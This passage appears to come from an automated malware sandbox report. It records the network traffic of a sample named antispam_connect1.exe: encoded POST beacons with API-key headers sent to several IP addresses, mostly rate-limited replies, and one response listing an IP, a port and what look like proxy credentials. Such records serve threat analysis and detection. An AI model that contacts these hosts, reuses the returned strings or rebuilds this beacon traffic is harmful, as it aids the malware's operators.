                                            Oct 14, 2024 17:23:20.182188988 CEST4999580192.168.2.546.8.236.61
                                            Oct 14, 2024 17:23:20.187189102 CEST804999546.8.236.61192.168.2.5
                                            Oct 14, 2024 17:23:20.213819027 CEST4999480192.168.2.546.8.232.106
                                            Oct 14, 2024 17:23:20.866760969 CEST804999546.8.236.61192.168.2.5
                                            Oct 14, 2024 17:23:20.883776903 CEST4999680192.168.2.593.185.159.253
                                            Oct 14, 2024 17:23:20.888725042 CEST804999693.185.159.253192.168.2.5
                                            Oct 14, 2024 17:23:20.888921976 CEST4999680192.168.2.593.185.159.253
                                            Oct 14, 2024 17:23:20.889127970 CEST4999680192.168.2.593.185.159.253
                                            Oct 14, 2024 17:23:20.893944979 CEST804999693.185.159.253192.168.2.5
                                            Oct 14, 2024 17:23:20.920665026 CEST4999580192.168.2.546.8.236.61
                                            Oct 14, 2024 17:23:21.467711926 CEST4970480192.168.2.546.8.232.106
                                            Oct 14, 2024 17:23:21.472645998 CEST804970446.8.232.106192.168.2.5
                                            Oct 14, 2024 17:23:21.588639975 CEST804999693.185.159.253192.168.2.5
                                            Oct 14, 2024 17:23:21.604548931 CEST4999780192.168.2.591.212.166.91
                                            Oct 14, 2024 17:23:21.609498978 CEST804999791.212.166.91192.168.2.5
                                            Oct 14, 2024 17:23:21.609580040 CEST4999780192.168.2.591.212.166.91
                                            Oct 14, 2024 17:23:21.609951973 CEST4999780192.168.2.591.212.166.91
                                            Oct 14, 2024 17:23:21.614748955 CEST804999791.212.166.91192.168.2.5
                                            Oct 14, 2024 17:23:21.641443014 CEST4999680192.168.2.593.185.159.253
                                            Oct 14, 2024 17:23:21.689081907 CEST4970512658192.168.2.5109.172.88.38
                                            Oct 14, 2024 17:23:21.693959951 CEST1265849705109.172.88.38192.168.2.5
                                            Oct 14, 2024 17:23:21.911319971 CEST1265849705109.172.88.38192.168.2.5
                                            Oct 14, 2024 17:23:21.959173918 CEST4970512658192.168.2.5109.172.88.38
                                            Oct 14, 2024 17:23:22.302325964 CEST804999791.212.166.91192.168.2.5
                                            Oct 14, 2024 17:23:22.320003986 CEST4999880192.168.2.5188.130.206.243
                                            Oct 14, 2024 17:23:22.324991941 CEST8049998188.130.206.243192.168.2.5
                                            Oct 14, 2024 17:23:22.325076103 CEST4999880192.168.2.5188.130.206.243
                                            Oct 14, 2024 17:23:22.325318098 CEST4999880192.168.2.5188.130.206.243
                                            Oct 14, 2024 17:23:22.330322027 CEST8049998188.130.206.243192.168.2.5
                                            Oct 14, 2024 17:23:22.356976032 CEST4999780192.168.2.591.212.166.91
                                            Oct 14, 2024 17:23:22.537683010 CEST1265849705109.172.88.38192.168.2.5
                                            Oct 14, 2024 17:23:22.537914991 CEST4970512658192.168.2.5109.172.88.38
                                            Oct 14, 2024 17:23:22.542865992 CEST1265849705109.172.88.38192.168.2.5
                                            Oct 14, 2024 17:23:23.380269051 CEST8049998188.130.206.243192.168.2.5
                                            Oct 14, 2024 17:23:23.380645037 CEST4999880192.168.2.5188.130.206.243
                                            Oct 14, 2024 17:23:23.380661964 CEST4999780192.168.2.591.212.166.91
                                            Oct 14, 2024 17:23:23.380714893 CEST4999680192.168.2.593.185.159.253
                                            Oct 14, 2024 17:23:23.380759954 CEST4999480192.168.2.546.8.232.106
                                            Oct 14, 2024 17:23:23.380762100 CEST4999580192.168.2.546.8.236.61
                                            Oct 14, 2024 17:23:23.381438017 CEST8049998188.130.206.243192.168.2.5
                                            Oct 14, 2024 17:23:23.381501913 CEST4999880192.168.2.5188.130.206.243
                                            Oct 14, 2024 17:23:23.386168003 CEST8049998188.130.206.243192.168.2.5
                                            Oct 14, 2024 17:23:23.386303902 CEST4999880192.168.2.5188.130.206.243
                                            Oct 14, 2024 17:23:23.387281895 CEST804999791.212.166.91192.168.2.5
                                            Oct 14, 2024 17:23:23.387298107 CEST804999693.185.159.253192.168.2.5
                                            Oct 14, 2024 17:23:23.387352943 CEST4999780192.168.2.591.212.166.91
                                            Oct 14, 2024 17:23:23.387378931 CEST4999680192.168.2.593.185.159.253
                                            Oct 14, 2024 17:23:23.387428999 CEST804999546.8.236.61192.168.2.5
                                            Oct 14, 2024 17:23:23.387444019 CEST804999446.8.232.106192.168.2.5
                                            Oct 14, 2024 17:23:23.387486935 CEST4999580192.168.2.546.8.236.61
                                            Oct 14, 2024 17:23:23.387507915 CEST4999480192.168.2.546.8.232.106
                                            Oct 14, 2024 17:23:37.554431915 CEST4970512658192.168.2.5109.172.88.38
                                            Oct 14, 2024 17:23:37.559257030 CEST1265849705109.172.88.38192.168.2.5
                                            Oct 14, 2024 17:23:42.770524025 CEST1265849705109.172.88.38192.168.2.5
                                            Oct 14, 2024 17:23:42.770903111 CEST4970512658192.168.2.5109.172.88.38
                                            Oct 14, 2024 17:23:42.775836945 CEST1265849705109.172.88.38192.168.2.5
                                            Oct 14, 2024 17:23:45.178322077 CEST4999980192.168.2.546.8.232.106
                                            Oct 14, 2024 17:23:45.183397055 CEST804999946.8.232.106192.168.2.5
                                            Oct 14, 2024 17:23:45.183487892 CEST4999980192.168.2.546.8.232.106
                                            Oct 14, 2024 17:23:45.183733940 CEST4999980192.168.2.546.8.232.106
                                            Oct 14, 2024 17:23:45.188640118 CEST804999946.8.232.106192.168.2.5
                                            Oct 14, 2024 17:23:45.849822998 CEST804999946.8.232.106192.168.2.5
                                            Oct 14, 2024 17:23:45.866900921 CEST5000080192.168.2.546.8.236.61
                                            Oct 14, 2024 17:23:45.875129938 CEST805000046.8.236.61192.168.2.5
                                            Oct 14, 2024 17:23:45.875206947 CEST5000080192.168.2.546.8.236.61
                                            Oct 14, 2024 17:23:45.875452995 CEST5000080192.168.2.546.8.236.61
                                            Oct 14, 2024 17:23:45.880263090 CEST805000046.8.236.61192.168.2.5
                                            Oct 14, 2024 17:23:45.891639948 CEST4999980192.168.2.546.8.232.106
                                            Oct 14, 2024 17:23:46.663028002 CEST805000046.8.236.61192.168.2.5
                                            Oct 14, 2024 17:23:46.685333967 CEST5000180192.168.2.593.185.159.253
                                            Oct 14, 2024 17:23:46.690265894 CEST805000193.185.159.253192.168.2.5
                                            Oct 14, 2024 17:23:46.690349102 CEST5000180192.168.2.593.185.159.253
                                            Oct 14, 2024 17:23:46.690642118 CEST5000180192.168.2.593.185.159.253
                                            Oct 14, 2024 17:23:46.695763111 CEST805000193.185.159.253192.168.2.5
                                            Oct 14, 2024 17:23:46.706731081 CEST5000080192.168.2.546.8.236.61
                                            Oct 14, 2024 17:23:47.399589062 CEST805000193.185.159.253192.168.2.5
                                            Oct 14, 2024 17:23:47.416282892 CEST5000280192.168.2.591.212.166.91
                                            Oct 14, 2024 17:23:47.421247959 CEST805000291.212.166.91192.168.2.5
                                            Oct 14, 2024 17:23:47.421339035 CEST5000280192.168.2.591.212.166.91
                                            Oct 14, 2024 17:23:47.421597004 CEST5000280192.168.2.591.212.166.91
                                            Oct 14, 2024 17:23:47.426419020 CEST805000291.212.166.91192.168.2.5
                                            Oct 14, 2024 17:23:47.453180075 CEST5000180192.168.2.593.185.159.253
                                            Oct 14, 2024 17:23:48.151674986 CEST805000291.212.166.91192.168.2.5
                                            Oct 14, 2024 17:23:48.168302059 CEST5000380192.168.2.5188.130.206.243
                                            Oct 14, 2024 17:23:48.173144102 CEST8050003188.130.206.243192.168.2.5
                                            Oct 14, 2024 17:23:48.173255920 CEST5000380192.168.2.5188.130.206.243
                                            Oct 14, 2024 17:23:48.173584938 CEST5000380192.168.2.5188.130.206.243
                                            Oct 14, 2024 17:23:48.178459883 CEST8050003188.130.206.243192.168.2.5
                                            Oct 14, 2024 17:23:48.205286026 CEST5000280192.168.2.591.212.166.91
                                            Oct 14, 2024 17:23:49.273998022 CEST8050003188.130.206.243192.168.2.5
                                            Oct 14, 2024 17:23:49.274220943 CEST5000380192.168.2.5188.130.206.243
                                            Oct 14, 2024 17:23:49.274249077 CEST5000280192.168.2.591.212.166.91
                                            Oct 14, 2024 17:23:49.274286985 CEST5000180192.168.2.593.185.159.253
                                            Oct 14, 2024 17:23:49.274302006 CEST5000080192.168.2.546.8.236.61
                                            Oct 14, 2024 17:23:49.274318933 CEST4999980192.168.2.546.8.232.106
                                            Oct 14, 2024 17:23:49.280277967 CEST8050003188.130.206.243192.168.2.5
                                            Oct 14, 2024 17:23:49.280301094 CEST805000291.212.166.91192.168.2.5
                                            Oct 14, 2024 17:23:49.280316114 CEST805000193.185.159.253192.168.2.5
                                            Oct 14, 2024 17:23:49.280325890 CEST805000046.8.236.61192.168.2.5
                                            Oct 14, 2024 17:23:49.280378103 CEST5000380192.168.2.5188.130.206.243
                                            Oct 14, 2024 17:23:49.280421019 CEST5000280192.168.2.591.212.166.91
                                            Oct 14, 2024 17:23:49.280430079 CEST5000180192.168.2.593.185.159.253
                                            Oct 14, 2024 17:23:49.280441046 CEST5000080192.168.2.546.8.236.61
                                            Oct 14, 2024 17:23:49.281080008 CEST804999946.8.232.106192.168.2.5
                                            Oct 14, 2024 17:23:49.281126976 CEST4999980192.168.2.546.8.232.106
                                            Oct 14, 2024 17:23:51.447282076 CEST4970480192.168.2.546.8.232.106
                                            Oct 14, 2024 17:23:51.454516888 CEST804970446.8.232.106192.168.2.5
                                            Oct 14, 2024 17:23:51.454579115 CEST4970480192.168.2.546.8.232.106
                                            Oct 14, 2024 17:23:51.917010069 CEST4970512658192.168.2.5109.172.88.38
                                            Oct 14, 2024 17:23:51.922033072 CEST1265849705109.172.88.38192.168.2.5
                                            Oct 14, 2024 17:23:52.142688990 CEST1265849705109.172.88.38192.168.2.5
                                            Oct 14, 2024 17:23:52.191528082 CEST4970512658192.168.2.5109.172.88.38
                                            Oct 14, 2024 17:23:53.397872925 CEST5000480192.168.2.546.8.232.106
                                            Oct 14, 2024 17:23:53.402997971 CEST805000446.8.232.106192.168.2.5
                                            Oct 14, 2024 17:23:53.403074980 CEST5000480192.168.2.546.8.232.106
                                            Oct 14, 2024 17:23:53.403402090 CEST5000480192.168.2.546.8.232.106
                                            Oct 14, 2024 17:23:53.408555984 CEST805000446.8.232.106192.168.2.5
                                            Oct 14, 2024 17:23:54.068721056 CEST805000446.8.232.106192.168.2.5
                                            Oct 14, 2024 17:23:54.085299015 CEST5000580192.168.2.546.8.236.61
                                            Oct 14, 2024 17:23:54.090780973 CEST805000546.8.236.61192.168.2.5
                                            Oct 14, 2024 17:23:54.090949059 CEST5000580192.168.2.546.8.236.61
                                            Oct 14, 2024 17:23:54.091245890 CEST5000580192.168.2.546.8.236.61
                                            Oct 14, 2024 17:23:54.095990896 CEST805000546.8.236.61192.168.2.5
                                            Oct 14, 2024 17:23:54.123060942 CEST5000480192.168.2.546.8.232.106
                                            Oct 14, 2024 17:23:54.790015936 CEST805000546.8.236.61192.168.2.5
                                            Oct 14, 2024 17:23:54.808712959 CEST5000680192.168.2.593.185.159.253
                                            Oct 14, 2024 17:23:54.813704967 CEST805000693.185.159.253192.168.2.5
                                            Oct 14, 2024 17:23:54.816685915 CEST5000680192.168.2.593.185.159.253
                                            Oct 14, 2024 17:23:54.817363024 CEST5000680192.168.2.593.185.159.253
                                            Oct 14, 2024 17:23:54.822679043 CEST805000693.185.159.253192.168.2.5
                                            Oct 14, 2024 17:23:54.832911968 CEST5000580192.168.2.546.8.236.61
                                            Oct 14, 2024 17:23:55.521861076 CEST805000693.185.159.253192.168.2.5
                                            Oct 14, 2024 17:23:55.546279907 CEST5000780192.168.2.591.212.166.91
                                            Oct 14, 2024 17:23:55.551616907 CEST805000791.212.166.91192.168.2.5
                                            Oct 14, 2024 17:23:55.551770926 CEST5000780192.168.2.591.212.166.91
                                            Oct 14, 2024 17:23:55.552174091 CEST5000780192.168.2.591.212.166.91
                                            Oct 14, 2024 17:23:55.557176113 CEST805000791.212.166.91192.168.2.5
                                            Oct 14, 2024 17:23:55.568422079 CEST5000680192.168.2.593.185.159.253
                                            Oct 14, 2024 17:23:56.267043114 CEST805000791.212.166.91192.168.2.5
                                            Oct 14, 2024 17:23:56.283246040 CEST5000880192.168.2.5188.130.206.243
                                            Oct 14, 2024 17:23:56.288155079 CEST8050008188.130.206.243192.168.2.5
                                            Oct 14, 2024 17:23:56.288242102 CEST5000880192.168.2.5188.130.206.243
                                            Oct 14, 2024 17:23:56.288460016 CEST5000880192.168.2.5188.130.206.243
                                            Oct 14, 2024 17:23:56.293313980 CEST8050008188.130.206.243192.168.2.5
                                            Oct 14, 2024 17:23:56.320074081 CEST5000780192.168.2.591.212.166.91
                                            Oct 14, 2024 17:23:57.128833055 CEST8050008188.130.206.243192.168.2.5
                                            Oct 14, 2024 17:23:57.129149914 CEST5000880192.168.2.5188.130.206.243
                                            Oct 14, 2024 17:23:57.129149914 CEST5000780192.168.2.591.212.166.91
                                            Oct 14, 2024 17:23:57.129196882 CEST5000680192.168.2.593.185.159.253
                                            Oct 14, 2024 17:23:57.129195929 CEST5000580192.168.2.546.8.236.61
                                            Oct 14, 2024 17:23:57.129242897 CEST5000480192.168.2.546.8.232.106
                                            Oct 14, 2024 17:23:57.134697914 CEST8050008188.130.206.243192.168.2.5
                                            Oct 14, 2024 17:23:57.134787083 CEST5000880192.168.2.5188.130.206.243
                                            Oct 14, 2024 17:23:57.135668993 CEST805000791.212.166.91192.168.2.5
                                            Oct 14, 2024 17:23:57.135680914 CEST805000693.185.159.253192.168.2.5
                                            Oct 14, 2024 17:23:57.135689974 CEST805000546.8.236.61192.168.2.5
                                            Oct 14, 2024 17:23:57.135699987 CEST805000446.8.232.106192.168.2.5
                                            Oct 14, 2024 17:23:57.135740995 CEST5000780192.168.2.591.212.166.91
                                            Oct 14, 2024 17:23:57.135776043 CEST5000680192.168.2.593.185.159.253
                                            Oct 14, 2024 17:23:57.135773897 CEST5000580192.168.2.546.8.236.61
                                            Oct 14, 2024 17:23:57.135931015 CEST5000480192.168.2.546.8.232.106
                                            Oct 14, 2024 17:24:02.994237900 CEST1265849705109.172.88.38192.168.2.5
                                            Oct 14, 2024 17:24:02.994513035 CEST4970512658192.168.2.5109.172.88.38
                                            Oct 14, 2024 17:24:03.000416040 CEST1265849705109.172.88.38192.168.2.5
                                            Oct 14, 2024 17:24:18.010754108 CEST4970512658192.168.2.5109.172.88.38
                                            Oct 14, 2024 17:24:18.015782118 CEST1265849705109.172.88.38192.168.2.5

                                            HTTP Request Dependency Graph

                                            • 46.8.232.106
                                            • 46.8.236.61
                                            • 93.185.159.253
                                            • 91.212.166.91
                                            • 188.130.206.243

                                            HTTP Packets

                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            0192.168.2.54970446.8.232.106805024C:\Users\user\Desktop\antispam_connect1.exe
                                            TimestampBytes transferredDirectionData
                                            Oct 14, 2024 17:22:20.402834892 CEST290OUTPOST / HTTP/1.1
                                            Host: 46.8.232.106
                                            User-Agent: Go-http-client/1.1
                                            Content-Length: 154
                                            X-Api-Key: lu4b1kVS
                                            Accept-Encoding: gzip
                                            Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 12 16 36 04 57 26 1e 14 0e 07 35 2c 09 04 3c 39 44 45 45 13 1d 01 1e 10 32 10 0a 1c 08 08 0a 06 4d 54 44 2f 29 11 16 18 2e 0e 09 41 43 4c 16 1b 08 1b 16 3e 07 1a 14 14 00 1c 02 4b 5d 41 20 2c 09 30 2e 06 58 24 44 45 45 01 1a 07 0a 0d 31 06 1d 1d 0f 06 09 41 55 4c 56 5a 3e 0f 41 06 29 28 54 5a 5f 03 44 45 45 0e 0b 5b 44 53 45 5a 58 5e 05 50 56 5b 09 0a 02 0c 50 53 09 0a 52 0c 52 54 0c 5e 02 0b 50 57 0c 0c 53 5d 05 06 5f 4c 1b
                                            Data Ascii: M*L\K6W&5,<9DEE2MTD/).ACL>K]A ,0.X$DEE1AULVZ>A)(TZ_DEE[DSEZX^PV[PSRRT^PWS]_L
                                            Oct 14, 2024 17:22:21.447716951 CEST554INHTTP/1.1 200 OK
                                            Date: Mon, 14 Oct 2024 15:22:21 GMT
                                            Content-Length: 436
                                            Content-Type: text/plain; charset=utf-8
                                            Data Raw: 31 30 39 2e 31 37 32 2e 38 38 2e 33 38 3b 31 32 36 35 38 3b 68 31 56 52 74 58 6f 56 74 67 55 62 70 52 52 34 3a 4b 37 38 2f 67 42 4f 2f 77 48 45 34 6f 4c 39 36 69 35 66 2e 64 66 57 38 6d 32 48 2e 6e 44 4b 32 52 77 4d 33 61 38 44 32 56 78 62 2e 31 4b 65 31 54 62 6c 30 52 71 31 36 38 4c 69 2c 57 6c 7a 68 6d 70 72 74 36 7a 4d 74 46 42 55 70 62 57 37 3a 34 50 44 2f 48 6f 66 2f 37 36 54 34 6f 39 75 36 6c 58 46 2e 35 6c 78 38 32 44 4a 2e 44 64 6e 32 4a 6b 47 33 72 4f 38 36 47 4e 39 2e 52 76 47 36 78 63 45 31 70 35 54 2c 70 78 52 68 49 6f 50 74 44 6c 62 74 63 79 56 70 4c 6a 34 3a 45 39 4f 2f 65 38 62 2f 61 56 6a 39 69 48 41 33 66 56 39 2e 42 79 4a 31 75 4f 69 38 33 68 56 35 39 51 75 2e 62 58 41 31 4c 72 4b 35 61 73 30 39 47 63 69 2e 48 64 48 32 50 48 39 35 46 4b 73 33 70 37 6d 2c 78 46 59 68 78 55 4f 74 68 50 52 74 55 67 69 70 52 71 71 3a 41 59 4e 2f 30 67 57 2f 6a 74 72 39 44 76 52 31 54 52 57 2e 34 6c 54 32 51 68 68 31 6e 72 49 32 39 4f 7a 2e 49 4f 74 31 4c 77 70 36 58 74 41 36 6c 6f 76 2e 67 34 4a 39 4d [TRUNCATED]
                                            Data Ascii: 109.172.88.38;12658;h1VRtXoVtgUbpRR4:K78/gBO/wHE4oL96i5f.dfW8m2H.nDK2RwM3a8D2Vxb.1Ke1Tbl0Rq168Li,Wlzhmprt6zMtFBUpbW7:4PD/Hof/76T4o9u6lXF.5lx82DJ.Ddn2JkG3rO86GN9.RvG6xcE1p5T,pxRhIoPtDlbtcyVpLj4:E9O/e8b/aVj9iHA3fV9.ByJ1uOi83hV59Qu.bXA1LrK5as09Gci.HdH2PH95FKs3p7m,xFYhxUOthPRtUgipRqq:AYN/0gW/jtr9DvR1TRW.4lT2Qhh1nrI29Oz.IOt1Lwp6XtA6lov.g4J9M7Y1aki,BhJhK80tZRJtHjBpPhg:GF8/ws3/gOw1DJJ8ZxG8E4n.kqO1OjZ3ST10pP2.icR2SWD0WT76e1M.C3l2jI04orM3ViS
                                            Oct 14, 2024 17:22:51.459043026 CEST6OUTData Raw: 00
                                            Data Ascii:
                                            Oct 14, 2024 17:23:21.467711926 CEST6OUTData Raw: 00
                                            Data Ascii:


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            1192.168.2.54978446.8.232.106801600C:\Users\user\Desktop\antispam_connect1.exe
                                            TimestampBytes transferredDirectionData
                                            Oct 14, 2024 17:22:36.946562052 CEST290OUTPOST / HTTP/1.1
                                            Host: 46.8.232.106
                                            User-Agent: Go-http-client/1.1
                                            Content-Length: 154
                                            X-Api-Key: IwqMvO4E
                                            Accept-Encoding: gzip
                                            Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 12 16 36 04 57 26 1e 14 0e 07 35 2c 09 04 3c 39 44 45 45 13 1d 01 1e 10 32 10 0a 1c 08 08 0a 06 4d 54 44 2f 29 11 16 18 2e 0e 09 41 43 4c 16 1b 08 1b 16 3e 07 1a 14 14 00 1c 02 4b 5d 41 20 2c 09 30 2e 06 58 24 44 45 45 01 1a 07 0a 0d 31 06 1d 1d 0f 06 09 41 55 4c 56 5a 3e 0f 41 06 29 28 54 5a 5f 03 44 45 45 0e 0b 5b 44 53 45 5a 58 5e 05 50 56 5b 09 0a 02 0c 50 53 09 0a 52 0c 52 54 0c 5e 02 0b 50 57 0c 0c 53 5d 05 06 5f 4c 1b
                                            Data Ascii: M*L\K6W&5,<9DEE2MTD/).ACL>K]A ,0.X$DEE1AULVZ>A)(TZ_DEE[DSEZX^PV[PSRRT^PWS]_L
                                            Oct 14, 2024 17:22:37.610862017 CEST183INHTTP/1.1 429 Too Many Requests
                                            Content-Type: text/plain; charset=utf-8
                                            X-Content-Type-Options: nosniff
                                            Date: Mon, 14 Oct 2024 15:22:37 GMT
                                            Content-Length: 18
                                            Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
                                            Data Ascii: Too many requests


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            2192.168.2.54979046.8.236.61801600C:\Users\user\Desktop\antispam_connect1.exe
                                            TimestampBytes transferredDirectionData
                                            Oct 14, 2024 17:22:37.634156942 CEST289OUTPOST / HTTP/1.1
                                            Host: 46.8.236.61
                                            User-Agent: Go-http-client/1.1
                                            Content-Length: 154
                                            X-Api-Key: gNf5iXCC
                                            Accept-Encoding: gzip
                                            Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 12 16 36 04 57 26 1e 14 0e 07 35 2c 09 04 3c 39 44 45 45 13 1d 01 1e 10 32 10 0a 1c 08 08 0a 06 4d 54 44 2f 29 11 16 18 2e 0e 09 41 43 4c 16 1b 08 1b 16 3e 07 1a 14 14 00 1c 02 4b 5d 41 20 2c 09 30 2e 06 58 24 44 45 45 01 1a 07 0a 0d 31 06 1d 1d 0f 06 09 41 55 4c 56 5a 3e 0f 41 06 29 28 54 5a 5f 03 44 45 45 0e 0b 5b 44 53 45 5a 58 5e 05 50 56 5b 09 0a 02 0c 50 53 09 0a 52 0c 52 54 0c 5e 02 0b 50 57 0c 0c 53 5d 05 06 5f 4c 1b
                                            Data Ascii: M*L\K6W&5,<9DEE2MTD/).ACL>K]A ,0.X$DEE1AULVZ>A)(TZ_DEE[DSEZX^PV[PSRRT^PWS]_L
                                            Oct 14, 2024 17:22:38.384016991 CEST183INHTTP/1.1 429 Too Many Requests
                                            Content-Type: text/plain; charset=utf-8
                                            X-Content-Type-Options: nosniff
                                            Date: Mon, 14 Oct 2024 15:22:38 GMT
                                            Content-Length: 18
                                            Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
                                            Data Ascii: Too many requests


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            3192.168.2.54979193.185.159.253801600C:\Users\user\Desktop\antispam_connect1.exe
                                            TimestampBytes transferredDirectionData
                                            Oct 14, 2024 17:22:38.481688976 CEST292OUTPOST / HTTP/1.1
                                            Host: 93.185.159.253
                                            User-Agent: Go-http-client/1.1
                                            Content-Length: 154
                                            X-Api-Key: OlvdCeeS
                                            Accept-Encoding: gzip
                                            Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 12 16 36 04 57 26 1e 14 0e 07 35 2c 09 04 3c 39 44 45 45 13 1d 01 1e 10 32 10 0a 1c 08 08 0a 06 4d 54 44 2f 29 11 16 18 2e 0e 09 41 43 4c 16 1b 08 1b 16 3e 07 1a 14 14 00 1c 02 4b 5d 41 20 2c 09 30 2e 06 58 24 44 45 45 01 1a 07 0a 0d 31 06 1d 1d 0f 06 09 41 55 4c 56 5a 3e 0f 41 06 29 28 54 5a 5f 03 44 45 45 0e 0b 5b 44 53 45 5a 58 5e 05 50 56 5b 09 0a 02 0c 50 53 09 0a 52 0c 52 54 0c 5e 02 0b 50 57 0c 0c 53 5d 05 06 5f 4c 1b
                                            Data Ascii: M*L\K6W&5,<9DEE2MTD/).ACL>K]A ,0.X$DEE1AULVZ>A)(TZ_DEE[DSEZX^PV[PSRRT^PWS]_L
                                            Oct 14, 2024 17:22:39.177650928 CEST183INHTTP/1.1 429 Too Many Requests
                                            Content-Type: text/plain; charset=utf-8
                                            X-Content-Type-Options: nosniff
                                            Date: Mon, 14 Oct 2024 15:22:39 GMT
                                            Content-Length: 18
                                            Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
                                            Data Ascii: Too many requests


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            4192.168.2.54979791.212.166.91801600C:\Users\user\Desktop\antispam_connect1.exe
                                            TimestampBytes transferredDirectionData
                                            Oct 14, 2024 17:22:39.199464083 CEST291OUTPOST / HTTP/1.1
                                            Host: 91.212.166.91
                                            User-Agent: Go-http-client/1.1
                                            Content-Length: 154
                                            X-Api-Key: G7z8sjLn
                                            Accept-Encoding: gzip
                                            Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 12 16 36 04 57 26 1e 14 0e 07 35 2c 09 04 3c 39 44 45 45 13 1d 01 1e 10 32 10 0a 1c 08 08 0a 06 4d 54 44 2f 29 11 16 18 2e 0e 09 41 43 4c 16 1b 08 1b 16 3e 07 1a 14 14 00 1c 02 4b 5d 41 20 2c 09 30 2e 06 58 24 44 45 45 01 1a 07 0a 0d 31 06 1d 1d 0f 06 09 41 55 4c 56 5a 3e 0f 41 06 29 28 54 5a 5f 03 44 45 45 0e 0b 5b 44 53 45 5a 58 5e 05 50 56 5b 09 0a 02 0c 50 53 09 0a 52 0c 52 54 0c 5e 02 0b 50 57 0c 0c 53 5d 05 06 5f 4c 1b
                                            Data Ascii: M*L\K6W&5,<9DEE2MTD/).ACL>K]A ,0.X$DEE1AULVZ>A)(TZ_DEE[DSEZX^PV[PSRRT^PWS]_L
                                            Oct 14, 2024 17:22:39.915122986 CEST183INHTTP/1.1 429 Too Many Requests
                                            Content-Type: text/plain; charset=utf-8
                                            X-Content-Type-Options: nosniff
                                            Date: Mon, 14 Oct 2024 15:22:39 GMT
                                            Content-Length: 18
                                            Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
                                            Data Ascii: Too many requests


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            5192.168.2.549803188.130.206.243801600C:\Users\user\Desktop\antispam_connect1.exe
                                            TimestampBytes transferredDirectionData
                                            Oct 14, 2024 17:22:39.936436892 CEST293OUTPOST / HTTP/1.1
                                            Host: 188.130.206.243
                                            User-Agent: Go-http-client/1.1
                                            Content-Length: 154
                                            X-Api-Key: OEISFmzO
                                            Accept-Encoding: gzip
                                            Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 12 16 36 04 57 26 1e 14 0e 07 35 2c 09 04 3c 39 44 45 45 13 1d 01 1e 10 32 10 0a 1c 08 08 0a 06 4d 54 44 2f 29 11 16 18 2e 0e 09 41 43 4c 16 1b 08 1b 16 3e 07 1a 14 14 00 1c 02 4b 5d 41 20 2c 09 30 2e 06 58 24 44 45 45 01 1a 07 0a 0d 31 06 1d 1d 0f 06 09 41 55 4c 56 5a 3e 0f 41 06 29 28 54 5a 5f 03 44 45 45 0e 0b 5b 44 53 45 5a 58 5e 05 50 56 5b 09 0a 02 0c 50 53 09 0a 52 0c 52 54 0c 5e 02 0b 50 57 0c 0c 53 5d 05 06 5f 4c 1b
                                            Data Ascii: M*L\K6W&5,<9DEE2MTD/).ACL>K]A ,0.X$DEE1AULVZ>A)(TZ_DEE[DSEZX^PV[PSRRT^PWS]_L
                                            Oct 14, 2024 17:22:41.036286116 CEST165INHTTP/1.1 429 Too Many Requests
                                            Content-Type: text/plain; charset=utf-8
                                            X-Content-Type-Options: nosniff
                                            Date: Mon, 14 Oct 2024 15:22:40 GMT
                                            Content-Length: 1
                                            Data Raw: 0a
                                            Data Ascii:


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            6192.168.2.54983946.8.232.106801900C:\Users\user\Desktop\antispam_connect1.exe
                                            TimestampBytes transferredDirectionData
                                            Oct 14, 2024 17:22:45.436721087 CEST290OUTPOST / HTTP/1.1
                                            Host: 46.8.232.106
                                            User-Agent: Go-http-client/1.1
                                            Content-Length: 154
                                            X-Api-Key: CCittVV6
                                            Accept-Encoding: gzip
                                            Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 12 16 36 04 57 26 1e 14 0e 07 35 2c 09 04 3c 39 44 45 45 13 1d 01 1e 10 32 10 0a 1c 08 08 0a 06 4d 54 44 2f 29 11 16 18 2e 0e 09 41 43 4c 16 1b 08 1b 16 3e 07 1a 14 14 00 1c 02 4b 5d 41 20 2c 09 30 2e 06 58 24 44 45 45 01 1a 07 0a 0d 31 06 1d 1d 0f 06 09 41 55 4c 56 5a 3e 0f 41 06 29 28 54 5a 5f 03 44 45 45 0e 0b 5b 44 53 45 5a 58 5e 05 50 56 5b 09 0a 02 0c 50 53 09 0a 52 0c 52 54 0c 5e 02 0b 50 57 0c 0c 53 5d 05 06 5f 4c 1b
                                            Data Ascii: M*L\K6W&5,<9DEE2MTD/).ACL>K]A ,0.X$DEE1AULVZ>A)(TZ_DEE[DSEZX^PV[PSRRT^PWS]_L
                                            Oct 14, 2024 17:22:46.197560072 CEST183INHTTP/1.1 429 Too Many Requests
                                            Content-Type: text/plain; charset=utf-8
                                            X-Content-Type-Options: nosniff
                                            Date: Mon, 14 Oct 2024 15:22:46 GMT
                                            Content-Length: 18
                                            Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
                                            Data Ascii: Too many requests


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            7192.168.2.54984446.8.236.61801900C:\Users\user\Desktop\antispam_connect1.exe
                                            TimestampBytes transferredDirectionData
                                            Oct 14, 2024 17:22:46.220381021 CEST289OUTPOST / HTTP/1.1
                                            Host: 46.8.236.61
                                            User-Agent: Go-http-client/1.1
                                            Content-Length: 154
                                            X-Api-Key: YoIfSmwx
                                            Accept-Encoding: gzip
